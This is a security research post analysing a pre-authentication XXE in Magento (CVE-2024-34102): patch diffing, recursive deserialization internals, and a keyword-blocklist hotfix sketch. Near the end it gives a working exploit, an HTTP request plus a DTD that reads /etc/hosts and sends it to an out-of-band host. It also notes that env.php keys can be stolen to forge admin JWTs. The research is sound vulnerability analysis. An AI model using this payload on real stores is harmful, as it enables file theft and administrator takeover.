Research Notes
June 26, 2024

Why nested deserialization is harmful: Magento XXE (CVE-2024-34102)

Creative Commons license

Magento is one of the most popular e-commerce solutions in use on the internet. It's estimated that there were over 140,000 instances of Magento running as of late 2023. Adobe's most recent advisory for Adobe Commerce / Magento, published on June 11th, 2024, highlighted a critical, pre-authentication XML external entity (XXE) injection issue (CVE-2024-34102), which Adobe rated CVSS 9.8.

It was quite surprising to us that no public proof-of-concept existed when we read the advisory. Given the criticality of this issue, and to give customers of our Attack Surface Management Platform certainty about its exploitability, our security research team developed a proof-of-concept well before our customers could be exploited by malicious actors.

We believe the vulnerability is severe for the following reasons:

- It is possible to exfiltrate Magento's <span class="code_single-line">app/etc/env.php</span> file, which contains the cryptographic key used to sign the JWTs Magento uses for authentication. An attacker can use this key to craft an administrator JWT and abuse Magento's APIs as an admin user on affected installations.

- The vulnerability can be chained with Charles Fol's recent research on PHP filter chains and his CVE-2024-2961 exploit, leading to remote code execution (RCE).

- It carries the broader impacts of XXE: the contents of any local file the server can read, or of any remote URL it can reach, can be exfiltrated.

We want to acknowledge Sergey Temnikov, who discovered this vulnerability, for his excellent work. Shortly after SanSec dubbed the vulnerability "CosmicString", he released a limited write-up of the issue, which discusses his methodology for discovering it but does not reveal a proof of concept. We highly recommend reading this write-up, as he explains Magento's internal deserialization process and its inherent dangers.

As we tracked public knowledge of this vulnerability, we found that SanSec's original emergency mitigation could be bypassed, and so could Sergey's first iteration of the "fixed" mitigation. As a result, both SanSec and Sergey updated their emergency hotfix mitigations over time.

This was interesting to observe: it highlighted the importance and effectiveness of peer review for emergency hotfixes, and it makes an argument for why disclosing the technical details of a vulnerability is important for the broader security industry.

To understand the key differences between an unpatched version of Magento and a patched one, we downloaded the packages <span class="code_single-line">magento2-2.4.7.zip</span> (unpatched) and <span class="code_single-line">magento2-2.4.7-p1.zip</span> (patched) from the Magento GitHub repository. Extracting these and running DiffMerge on the two directories revealed a very important clue to discovering this vulnerability:

Changes added to 2.4.7-p1

With the information that was publicly available, i.e., SanSec's first patch (blocking <span class="code_single-line">dataIsURL</span> inside the POST body) and the diff shown in the image above, it was clear to us that this vulnerability involved instantiating a <span class="code_single-line">SimpleXMLElement</span>. PHP's documentation for this class shows that <span class="code_single-line">dataIsURL</span> is an argument to the <span class="code_single-line">SimpleXMLElement</span> constructor that allows XML to be loaded from external sources.

Sergey's later updates to his hotfix revealed that blocking <span class="code_single-line">dataIsURL</span> was not sufficient, since the vulnerability was exploitable without it; his mitigation instead focused on blocking the keyword <span class="code_single-line">sourceData</span>.
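To make the keyword-blocking approach concrete, here is a minimal sketch of such a check, assuming the request body has already been JSON-decoded into an array. The function name <span class="code_single-line">containsBlockedKey</span> and the case-insensitive comparison are our own choices for illustration, not SanSec's or Sergey's actual hotfix code. As noted above, keyword blocklists of this kind were bypassed in practice, so treat this only as a stopgap until the official patch is applied.

```php
<?php
// Hypothetical stopgap check in the spirit of the emergency hotfixes: reject a
// decoded JSON body if any key, at any nesting depth, appears on a blocklist.
// Not the actual hotfix code; keyword blocklists like this were bypassed in practice.

function containsBlockedKey(mixed $value, array $blockedKeys): bool
{
    if (!is_array($value)) {
        return false; // scalars and null cannot contain keys
    }
    // Case-insensitive comparison is a conservative assumption on our part.
    $blocked = array_map('strtolower', $blockedKeys);
    foreach ($value as $key => $child) {
        if (is_string($key) && in_array(strtolower($key), $blocked, true)) {
            return true;
        }
        // Recurse, because the dangerous key can be nested arbitrarily deep.
        if (containsBlockedKey($child, $blockedKeys)) {
            return true;
        }
    }
    return false;
}

$body = '{"address":{"totalsReader":{"collectorList":{"totalCollector":{"sourceData":{}}}}}}';
$decoded = json_decode($body, true);

var_dump(containsBlockedKey($decoded, ['sourceData', 'dataIsURL'])); // bool(true)
```

The recursion matters because, as the rest of this post shows, the dangerous field sits several objects deep in the request body.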

With all of this information, we spent most of our time setting up a development environment for Magento and then searching for a deserialization gadget that would lead us to the instantiation of a <span class="code_single-line">SimpleXMLElement</span> with controllable arguments.

When it comes to complex deserialization issues, we highly recommend setting up a development environment in which you can debug the code with breakpoints. For Magento 2, we used the following repo to bootstrap our development efforts. This Docker image includes Xdebug and is already configured for PhpStorm. After spinning up the image, we installed Magento and seeded it with sample data using the following commands:

./scripts/composer create-project --repository-url=https://repo.magento.com/ magento/project-community-edition=2.4.7 /home/magento # 2.4.7 is the vulnerable version
./scripts/magento setup:install --base-url=http://magento2.test/ --db-host=mysql --db-name=magento_db --db-user=magento_user --db-password="PASSWD#" --admin-firstname=admin --admin-lastname=admin --admin-email=admin@admin.test --admin-user=admin --admin-password=admin1! --language=en_US --currency=USD --timezone=America/Chicago --use-rewrites=1 --search-engine opensearch --opensearch-host=opensearch --opensearch-port=9200
./scripts/magento sampledata:deploy
./scripts/magento setup:upgrade

When searching through the Magento 2 code base for <span class="code_single-line">Simplexml\\Element.*sourceData</span>, we identified the following locations that could be viable targets:

~/Downloads/magento2-2.4.7/app/code/Magento/Quote/Model/Quote/Address/Total/Collector.php:
   70       * @param \Magento\Store\Model\StoreManagerInterface $storeManager
   71       * @param \Magento\Quote\Model\Quote\Address\TotalFactory $totalFactory
   72:      * @param \Magento\Framework\Simplexml\Element|mixed $sourceData
   73       * @param mixed $store
   74       * @param SerializerInterface $serializer

~/Downloads/magento2-2.4.7/app/code/Magento/Sales/Model/Config/Ordered.php:
   84       * @param \Psr\Log\LoggerInterface $logger
   85       * @param \Magento\Sales\Model\Config $salesConfig
   86:      * @param \Magento\Framework\Simplexml\Element $sourceData
   87       * @param SerializerInterface $serializer
   88       */

~/Downloads/magento2-2.4.7/app/code/Magento/Sales/Model/Order/Total/Config/Base.php:
   44       * @param \Magento\Sales\Model\Config $salesConfig
   45       * @param \Magento\Sales\Model\Order\TotalFactory $orderTotalFactory
   46:      * @param \Magento\Framework\Simplexml\Element|mixed $sourceData
   47       * @param SerializerInterface $serializer
   48       */

~/Downloads/magento2-2.4.7/lib/internal/Magento/Framework/App/Config/Base.php:
   19  
   20      /**
   21:      * @param \Magento\Framework\Simplexml\Element|string $sourceData $sourceData
   22       */
   23      public function __construct($sourceData = null)

~/Downloads/magento2-2.4.7/lib/internal/Magento/Framework/App/Config/BaseFactory.php:
   26       * Create config model
   27       *
   28:      * @param string|\Magento\Framework\Simplexml\Element $sourceData
   29       * @return \Magento\Framework\App\Config\Base
   30       */

From this list, we believed the most likely candidate reachable without authentication was <span class="code_single-line">Magento/Quote/Model/Quote/Address/Total/Collector.php</span>. However, reading through the code itself, it was not obvious how the nesting worked or how it allowed <span class="code_single-line">sourceData</span> to be instantiated.
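The search above was a plain text search over the extracted source tree. As a rough, self-contained equivalent, the sketch below walks a directory and reports lines in <span class="code_single-line">.php</span> files that match the same regular expression. The function name <span class="code_single-line">findSinkCandidates</span> is ours, and restricting the scan to <span class="code_single-line">.php</span> files is an assumption made to keep the output focused.

```php
<?php
// Rough equivalent of a recursive grep: report "path:line: text" for every line of
// every .php file under $root that matches $pattern. Limiting to .php is our assumption.

function findSinkCandidates(string $root, string $pattern): array
{
    $hits = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (!$file->isFile() || $file->getExtension() !== 'php') {
            continue;
        }
        $lines = file($file->getPathname(), FILE_IGNORE_NEW_LINES) ?: [];
        foreach ($lines as $index => $line) {
            if (preg_match($pattern, $line) === 1) {
                $hits[] = $file->getPathname() . ':' . ($index + 1) . ': ' . trim($line);
            }
        }
    }
    sort($hits); // directory iteration order is not guaranteed
    return $hits;
}

// PCRE version of the search string; "\\\\" in a single-quoted PHP string becomes
// "\\" in the regex, which matches one literal backslash.
$pattern = '/Simplexml\\\\Element.*sourceData/';

// Example: print_r(findSinkCandidates('magento2-2.4.7', $pattern));
```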

To make further headway, it was necessary for us to understand at a high level how the input deserialization works. For that, we looked at <span class="code_single-line">magento2-2.4.7/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php</span> and its <span class="code_single-line">_createFromArray</span> method:

        $data = is_array($data) ? $data : [];
        // convert to string directly to avoid situations when $className is object
        // which implements __toString method like \ReflectionObject
        $className = (string) $className;
        $class = new ClassReflection($className);
        if (is_subclass_of($className, self::EXTENSION_ATTRIBUTES_TYPE)) {
            $className = substr($className, 0, -strlen('Interface'));
        }

        // Primary method: assign to constructor parameters
        $constructorArgs = $this->getConstructorData($className, $data);
        $object = $this->objectManager->create($className, $constructorArgs);

        // Secondary method: fallback to setter methods
        foreach ($data as $propertyName => $value) {
            // ... SNIP ...

At a high level, if Magento is parsing input data and expects a field <span class="code_single-line">address</span> containing a <span class="code_single-line">\Magento\Quote\Api\Data\Address</span>, it does the following:

- First, if a field in the JSON matches the name of a parameter in the class's constructor, that field is passed as the argument;

- Second, if the name doesn't match, it instead looks for a method on the class named <span class="code_single-line">set</span> plus the field name.

For example, if you passed the following JSON to the <span class="code_single-line">/rest/all/V1/guest-carts/test/estimate-shipping-methods</span> endpoint:

{
    "address": {
        "data": [1, 2, 3],
        "BaseShippingAmount" : 123
    }
}

- The field <span class="code_single-line">data</span> is in the constructor of the <span class="code_single-line">Address</span> class as <span class="code_single-line">array $data = []</span>, so it will be passed there.

- The <span class="code_single-line">Address</span> class has a method <span class="code_single-line">setBaseShippingAmount</span>, so after the class is instantiated it will call <span class="code_single-line">->setBaseShippingAmount(123)</span>.
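The two-phase behaviour described above can be modelled in a few lines. This is a simplified sketch, not Magento's implementation: <span class="code_single-line">ToyAddress</span> and <span class="code_single-line">toyCreateFromArray</span> are hypothetical, the sketch uses PHP's built-in reflection instead of Magento's object manager, and it ignores preferences, type conversion and recursion.

```php
<?php
// Simplified model (not Magento's code) of the two-phase mapping:
// 1. JSON fields whose names match constructor parameters go to the constructor.
// 2. Remaining fields are applied via a "set" + FieldName setter, if one exists.

class ToyAddress
{
    public array $data;
    public ?int $baseShippingAmount = null;

    public function __construct(array $data = [])
    {
        $this->data = $data;
    }

    public function setBaseShippingAmount(int $amount): void
    {
        $this->baseShippingAmount = $amount;
    }
}

function toyCreateFromArray(string $className, array $input): object
{
    $reflection = new ReflectionClass($className);
    $constructor = $reflection->getConstructor();
    $args = [];

    // Phase 1: fill constructor parameters, in order, by matching names.
    foreach ($constructor ? $constructor->getParameters() : [] as $param) {
        $name = $param->getName();
        if (array_key_exists($name, $input)) {
            $args[] = $input[$name];
            unset($input[$name]);
        } elseif ($param->isDefaultValueAvailable()) {
            $args[] = $param->getDefaultValue();
        } else {
            throw new InvalidArgumentException("Missing constructor argument: $name");
        }
    }
    $object = $reflection->newInstanceArgs($args);

    // Phase 2: fall back to setters for the fields the constructor did not consume.
    foreach ($input as $field => $value) {
        $setter = 'set' . ucfirst((string) $field);
        if (method_exists($object, $setter)) {
            $object->$setter($value);
        }
    }
    return $object;
}

$address = toyCreateFromArray(
    ToyAddress::class,
    json_decode('{"data": [1, 2, 3], "BaseShippingAmount": 123}', true)
);
var_dump($address->data, $address->baseShippingAmount);
```

This sketch silently ignores fields that match neither a constructor parameter nor a setter; how Magento handles that case is in the part of the excerpt we snipped.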

The danger comes from the fact that this process is recursive: if either the constructor or the setter takes a non-primitive type, such as another class, the deserialization process is applied recursively to that field. The constructor of the <span class="code_single-line">Address</span> class has 37 parameters, and it's clear the Magento developers did not intend for you to be able to instantiate all of them:

    public function __construct(
        Context $context,
        Registry $registry,
        ExtensionAttributesFactory $extensionFactory,
        AttributeValueFactory $customAttributeFactory,
        Data $directoryData,
        \Magento\Eav\Model\Config $eavConfig,
        \Magento\Customer\Model\Address\Config $addressConfig,
        RegionFactory $regionFactory,
        CountryFactory $countryFactory,
        AddressMetadataInterface $metadataService,
        AddressInterfaceFactory $addressDataFactory,
        RegionInterfaceFactory $regionDataFactory,
        DataObjectHelper $dataObjectHelper,
        ScopeConfigInterface $scopeConfig,
        \Magento\Quote\Model\Quote\Address\ItemFactory $addressItemFactory,
        \Magento\Quote\Model\ResourceModel\Quote\Address\Item\CollectionFactory $itemCollectionFactory,
        RateFactory $addressRateFactory,
        RateCollectorInterfaceFactory $rateCollector,
        CollectionFactory $rateCollectionFactory,
        RateRequestFactory $rateRequestFactory,
        CollectorFactory $totalCollectorFactory,
        TotalFactory $addressTotalFactory,
        Copy $objectCopyService,
        CarrierFactoryInterface $carrierFactory,
        Address\Validator $validator,
        Mapper $addressMapper,
        Address\CustomAttributeListInterface $attributeList,
        TotalsCollector $totalsCollector,
        TotalsReader $totalsReader,
        AbstractResource $resource = null,
        AbstractDb $resourceCollection = null,
        array $data = [],
        Json $serializer = null,
        StoreManagerInterface $storeManager = null,
        ?CompositeValidator $compositeValidator = null,
        ?CountryModelsCache $countryModelsCache = null,
        ?RegionModelsCache $regionModelsCache = null,
    ) {

This provides a huge surface for bugs. By traversing chains of constructors and setters, it is possible to instantiate a wide variety of internal classes that were never meant to be user-facing. And if any of those constructors or setters do dangerous things, such as in the case of <span class="code_single-line">SimpleXMLElement</span>, this could lead to a security vulnerability. Further details on how to map out the pre-authentication endpoints and corresponding models can be found in Sergey's write up.
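Adding recursion to the same kind of model shows why this is dangerous. In the sketch below, which again is illustrative rather than Magento's code, any constructor parameter typed as a class is built from the nested JSON object, so the shape of the request decides how deep object construction goes. The class names loosely mirror the field names used in our payload but are hypothetical stand-ins, and <span class="code_single-line">ToySink</span> merely stores its argument where a real sink would do something dangerous with it.

```php
<?php
// Illustrative model (not Magento's code): class-typed constructor parameters are
// themselves deserialized from nested JSON, recursively. All classes are hypothetical.

class ToySink
{
    // A real sink would do something dangerous with $sourceData, e.g. parse it.
    public function __construct(public string $sourceData = '') {}
}

class ToyCollectorList
{
    public function __construct(public ?ToySink $totalCollector = null) {}
}

class ToyTotalsReader
{
    public function __construct(public ?ToyCollectorList $collectorList = null) {}
}

class ToyNestedAddress
{
    public function __construct(
        public ?ToyTotalsReader $totalsReader = null,
        public array $data = [],
    ) {}
}

function toyCreateRecursive(string $className, array $input): object
{
    $reflection = new ReflectionClass($className);
    $constructor = $reflection->getConstructor();
    $args = [];
    foreach ($constructor ? $constructor->getParameters() : [] as $param) {
        $name = $param->getName();
        if (!array_key_exists($name, $input)) {
            if (!$param->isDefaultValueAvailable()) {
                throw new InvalidArgumentException("Missing constructor argument: $name");
            }
            $args[] = $param->getDefaultValue();
            continue;
        }
        $value = $input[$name];
        $type = $param->getType();
        if ($type instanceof ReflectionNamedType && !$type->isBuiltin() && is_array($value)) {
            // Non-primitive parameter: deserialize the nested object into that class.
            $value = toyCreateRecursive($type->getName(), $value);
        }
        $args[] = $value;
    }
    return $reflection->newInstanceArgs($args);
}

$payload = json_decode(
    '{"totalsReader":{"collectorList":{"totalCollector":{"sourceData":"attacker-controlled"}}}}',
    true
);
$address = toyCreateRecursive(ToyNestedAddress::class, $payload);
echo $address->totalsReader->collectorList->totalCollector->sourceData, PHP_EOL;
```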

The goal is now to find a chain of types in constructors that allow us to reach one of the <span class="code_single-line">Simplexml</span> sinks identified earlier. Rather than trace the constructor manually for each class, we added the following line to <span class="code_single-line">magento2-2.4.7/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php</span>:

private function getConstructorData(string $className, array $data): array
    {
        $preferenceClass = $this->config->getPreference($className);
        $class = new ClassReflection($preferenceClass ?: $className);

        try {
            $constructor = $class->getMethod('__construct');
        } catch (\ReflectionException $e) {
            $constructor = null;
        }

        if ($constructor === null) {
            return [];
        }

        $res = [];
        $parameters = $constructor->getParameters();
        var_dump($parameters); // <-- the line we added

This simple <span class="code_single-line">var_dump</span> helped us quickly understand all of the parameters we could provide when calling the unauthenticated REST APIs, based on the magic deserialization logic that Magento had built.

Reading the names of the constructor parameters, we found that the pre-authentication endpoint <span class="code_single-line">/rest/all/V1/guest-carts/test/estimate-shipping-methods</span> mentioned earlier was likely the best candidate for reaching <span class="code_single-line">sourceData</span>.

Debugging the available parameters was made easier with our <span class="code_single-line">var_dump</span> call, allowing us to quickly iterate on our payload with output as seen below:

  object(Laminas\Code\Reflection\ParameterReflection)#1176 (2) {
    ["name"]=>
    string(21) "totalCollectorFactory"
    ["isFromMethod":protected]=>
    bool(false)
  }
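If you prefer something terser than dumping whole <span class="code_single-line">ParameterReflection</span> objects, PHP's built-in reflection can print each constructor parameter as a one-line type and name. This is a sketch of the same idea rather than what we ran: <span class="code_single-line">describeConstructor</span> and <span class="code_single-line">ExampleModel</span> are hypothetical, and the sketch uses the native <span class="code_single-line">ReflectionClass</span> instead of the Laminas reflection wrapper seen in the output above.

```php
<?php
// Print each constructor parameter of a class as "type $name", using native reflection.
// ExampleModel is a hypothetical class used only to demonstrate the output format.

function describeConstructor(string $className): array
{
    $constructor = (new ReflectionClass($className))->getConstructor();
    if ($constructor === null) {
        return []; // class has no constructor
    }
    $rows = [];
    foreach ($constructor->getParameters() as $param) {
        $type = $param->getType();
        $rows[] = sprintf('%s $%s', $type === null ? '(untyped)' : (string) $type, $param->getName());
    }
    return $rows;
}

class ExampleModel
{
    public function __construct(
        ArrayObject $totalCollectorFactory,
        array $data = [],
        ?string $label = null,
        $untyped = null
    ) {
    }
}

foreach (describeConstructor(ExampleModel::class) as $row) {
    echo $row, PHP_EOL;
}
```

A non-builtin type in this output (here <span class="code_single-line">ArrayObject</span>) is exactly the kind of parameter the deserializer would recurse into.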

With further experimentation, we were able to develop the following payload, which instantiated a <span class="code_single-line">SimpleXMLElement</span> with controllable arguments via the <span class="code_single-line">sourceData</span> parameter:

POST /rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods HTTP/2
Host: example.com
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/json
Content-Length: 274

{
  "address": {
    "totalsReader": {
      "collectorList": {
        "totalCollector": {
          "sourceData": {
            "data": "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"http://your_ip:9999/dtd.xml\"> %sp; %param1; ]> <r>&exfil;</r>",
            "options": 16
          }
        }
      }
    }
  }
}
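Given the name-based constructor matching described earlier, the <span class="code_single-line">data</span> and <span class="code_single-line">options</span> fields line up with the <span class="code_single-line">$data</span> and <span class="code_single-line">$options</span> parameters of <span class="code_single-line">SimpleXMLElement</span>'s constructor, where <span class="code_single-line">$options</span> is a bitmask of libxml parser flags. The hypothetical helper below decodes such a bitmask against a subset of PHP's <span class="code_single-line">LIBXML_*</span> constants; 16 decodes to <span class="code_single-line">LIBXML_DTDVALID</span>, which asks libxml to validate the document against its DTD. For untrusted input, leaving DTD- and entity-related flags unset is the safer default.

```php
<?php
// Hypothetical helper: decode a libxml options bitmask into PHP's LIBXML_* names.
// Only a subset of the constants is listed here.

function describeLibxmlOptions(int $options): array
{
    $known = [
        'LIBXML_NOENT'     => LIBXML_NOENT,     // substitute entities
        'LIBXML_DTDLOAD'   => LIBXML_DTDLOAD,   // load the external subset
        'LIBXML_DTDATTR'   => LIBXML_DTDATTR,   // default DTD attributes
        'LIBXML_DTDVALID'  => LIBXML_DTDVALID,  // validate with the DTD
        'LIBXML_NOERROR'   => LIBXML_NOERROR,
        'LIBXML_NOWARNING' => LIBXML_NOWARNING,
        'LIBXML_NONET'     => LIBXML_NONET,     // disable network access
        'LIBXML_NOCDATA'   => LIBXML_NOCDATA,
    ];
    $names = [];
    foreach ($known as $name => $bit) {
        if (($options & $bit) === $bit) {
            $names[] = $name;
        }
    }
    return $names;
}

print_r(describeLibxmlOptions(16)); // the "options" value from the payload
```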

Our DTD, hosted at <span class="code_single-line">http://your_ip:9999/dtd.xml</span>, contained:

<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hosts">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://collabid.oastify.com/dtd.xml?%data;'>">

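This resulted in an out-of-band request to our collaborator server carrying the base64-encoded contents of <span class="code_single-line">/etc/hosts</span>.

Sweet, success!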
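The DTD routes the target file through <span class="code_single-line">php://filter/convert.base64-encode</span> before placing it in the exfiltration URL. A likely reason is that base64 output uses only <span class="code_single-line">[A-Za-z0-9+/=]</span>, so characters such as <span class="code_single-line">&lt;</span>, <span class="code_single-line">&amp;</span> or newlines in the file cannot break the entity definitions. The short sketch below shows the wrapper's effect on a throwaway temporary file; the file contents are made up for the demo.

```php
<?php
// Show what php://filter/convert.base64-encode does to a file's contents.
// Uses a throwaway temporary file; nothing here touches the network.

$path = tempnam(sys_get_temp_dir(), 'b64demo');
file_put_contents($path, "127.0.0.1 localhost\n<&> characters\n");

$viaFilter = file_get_contents('php://filter/convert.base64-encode/resource=' . $path);
unlink($path);

echo $viaFilter, PHP_EOL;
// The encoded form contains only [A-Za-z0-9+/=], none of which are special in XML.
var_dump(preg_match('#^[A-Za-z0-9+/=]+$#', $viaFilter) === 1);
```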


Written by:
Adam Kues
Shubham Shah